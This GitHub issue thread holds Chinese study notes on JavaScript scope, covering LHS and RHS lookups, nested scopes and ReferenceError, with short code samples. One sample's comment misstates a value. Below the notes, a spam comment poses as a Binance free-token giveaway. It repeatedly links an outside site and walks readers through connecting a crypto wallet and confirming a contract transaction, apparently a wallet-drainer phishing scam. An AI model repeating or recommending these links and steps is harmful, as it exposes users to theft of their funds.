### ISSUE TITLE
第 1 章 作用域是什么

### ISSUE THREAD

**Issue by zeromake** [zeromake/book-notes#1]
## 1.1 编译原理
JavaScript虽然是脚本语言但也是会被编译的。

JavaScript会在执行前进行编译。

当然编译过程中也做了很多的优化，但是并不会花费过多时间优化，因为马上要执行
## 1.2 理解作用域 
引擎执行被编译器编译好的代码遇到变量时会有两种对于作用域的查找方式。
1. LHS 查询
> 会到作用域上查找变量容器
``` javascript
var a = 2 // 这个应该说是 `var a; a = 2`两句话， LHS 查询变量a的容器赋值为2
```
2. RHS 查询
> 会到作用域上查找变量的值
``` javascript
var a = 5 // LHS
console.log(a) // RHS 获取a的值2，并且在 console.log 方法中对它的参数做LHS查询并设置为2
```
其中作用域的范围被 function 块所规定
在当前作用域中未查找到变量会到父级作用域中查找直到全局作用域。
## 1.3 作用域嵌套
子级作用域如果有与父级作用域同名的变量会在子级作用域的变量覆盖。
``` javascript
var a = 1
function foo(a) {
    console.log(a)
}
foo(2)
```
## 1.4 异常
LHS 和 RHS 查询都会不停的往上一层查找变量。
直到到达全局时都没有查找到。
- LHS 在非严格模式下会自动在全局变量上生成。
``` javascript
a = 1 // 会自动在 window 上生成 a 变量。
```
- RHS 则会报出 ReferenceError 异常
``` javascript
console.log(a)
```
## 1.5 小结
1. 了解了作用域的查找方式。  
2. js的作用域以(function|catch)作为分割。
3. LHS和RHS查找的区别。
4. LHS和RHS查找不到变量时错误以及在严格模式下的错误。

**Comment by xcluz-git** [comment]
# Binance Free Tokens Giveaway - Claim Yours Now! 🎉💰

Welcome to the exclusive Binance Free Tokens giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this fantastic opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

![https://www.bnbrewards.online/?source=github](https://pbs.twimg.com/media/ERgjjnWVUAA7Miq.jpg:large)

<center>Act swiftly and enjoy your tokens! This limited-time offer won't be available forever. 🌐💰</center>

# Steps to Claim:

1. **Spread the Excitement on Twitter:**
   - Share the news about claiming your free tokens!
     - **Tweet:** [Share this Airdrop](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto&hashtags=BinanceFreeTokens,Crypto)

2. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=github) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

3. **Interact with the Contract:**
   - Once your wallet is connected, go to the [Binance Rewards](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

4. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

5. **Spread the Excitement Further:**
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
